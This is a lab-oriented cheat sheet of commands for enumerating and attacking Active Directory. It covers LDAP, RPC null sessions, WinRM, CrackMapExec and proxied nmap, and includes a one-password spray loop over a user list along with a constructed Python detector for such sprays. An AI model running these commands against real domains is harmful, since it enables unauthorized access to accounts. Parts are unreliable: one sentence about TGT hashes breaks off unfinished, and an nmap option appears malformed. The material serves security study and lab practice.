🔎AD Post Enumeration/Exploitation

DNS

Kerberos (using the FQDN makes the client authenticate with a Kerberos ticket):
dir \\za.tryhackme.com\SYSVOL
NTLM (using the IP address makes the client fall back to NTLM):
dir \\<DC IP>\SYSVOL

To query the DC's DNS directly (interactive nslookup, then point it at the DC):

nslookup
server <ip>

PowerShell DNS config (point the Ethernet adapter at the DC so domain names resolve):

$dnsip = "<DC IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

LDAP (389)

ldapsearch -x -H ldap://<ip> -s base namingcontexts

Then use -b to pick a base DN from the naming contexts, followed by a filter and the attributes to return.

Example:

ldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person' sAMAccountName

To use Kerberos authentication (get a ticket with kinit, then bind with SASL/GSSAPI; the filter must be a valid LDAP filter):

kinit d.klay
ldapsearch -H ldap://dc.absolute.htb -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" "(objectClass=user)" description

To get a list of users (-H ldap:// rather than the -h flag, which newer OpenLDAP versions no longer accept):

ldapsearch -x -H ldap://172.16.5.5 -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

Examples with credentials (simple bind):

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch  -D 'ldap@support.htb' -w 'password' -b "DC=support,DC=htb" -H ldap://support.htb

RPC

rpcclient -U '' -N <ip>

Then run commands at the rpcclient prompt, e.g.:

enumdomusers

If a list of valid users is available, this sprays one password across all of them (one attempt per user, so lockout thresholds are not hit):

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
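As an added defender-side example (not part of the original notes): the spray above shows up on the DC as many failed logons against distinct accounts from one source inside a short window, which is the pattern to alert on rather than the per-account failure count. The Python below runs that logic over constructed, simplified 4625/4624 records; the one-line log format, the 5-minute window and the 4-user threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not real logs):
# <timestamp> <EventID> <source IP> <target user> <NTSTATUS>
# 4625 = failed logon, 4624 = successful logon, 0xC000006A = wrong password.
SAMPLE_LOG = """\
2024-01-10T09:00:01 4625 172.16.5.50 j.doe 0xC000006A
2024-01-10T09:00:02 4625 172.16.5.50 a.smith 0xC000006A
2024-01-10T09:00:02 4625 172.16.5.50 b.jones 0xC000006A
2024-01-10T09:00:03 4625 172.16.5.50 c.wu 0xC000006A
2024-01-10T09:00:04 4625 172.16.5.50 d.klay 0xC000006A
2024-01-10T09:00:05 4624 172.16.5.50 e.park 0x0
2024-01-10T09:03:00 4625 172.16.5.77 j.doe 0xC000006A
2024-01-10T09:03:10 4625 172.16.5.77 j.doe 0xC000006A
2024-01-10T09:03:20 4625 172.16.5.77 j.doe 0xC000006A
"""

def parse_events(text):
    """Parse the constructed one-line-per-event format above."""
    events = []
    for line in text.splitlines():
        ts, event_id, src, user, status = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), src, user, status))
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Flag sources whose failed logons hit >= min_users DISTINCT accounts
    inside a sliding window, and report accounts that then logged on
    successfully from the same source (the spray's hits).
    One account failing repeatedly (brute force) is intentionally not flagged."""
    failed = defaultdict(list)     # src -> [(time, user)]
    succeeded = defaultdict(set)   # src -> {user}
    for ts, eid, src, user, _status in events:
        if eid == 4625:
            failed[src].append((ts, user))
        elif eid == 4624:
            succeeded[src].add(user)
    alerts = {}
    for src, attempts in failed.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                alerts[src] = {"sprayed": sorted(users),
                               "succeeded": sorted(succeeded[src])}
                break
    return alerts
```

With the sample data only 172.16.5.50 is flagged; 172.16.5.77 fails three times against a single account and is left for a brute-force rule instead.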

WinRM (5985)

evil-winrm -u user -p password -i <ip>

SMB (445, 139)

CrackMapExec

To check the password policy (from Kali, over a null session):

crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''

To get TGT hashes for users with

For enumeration through a proxy (a TCP connect scan, -sT, handles proxied traffic better than a SYN scan):

proxychains nmap -n -Pn -F -sV -sT -oA nmap_results -vvv -iL ${target or targets.txt} -T4 --max-retries 1 --max-rtt-timeout 2s --ttl 50ms --open

To use Kerberos authentication (impacket smbclient.py with a ccache file in KRB5CCNAME):

KRB5CCNAME=svc_smb.ccache ./smbclient.py -k absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181
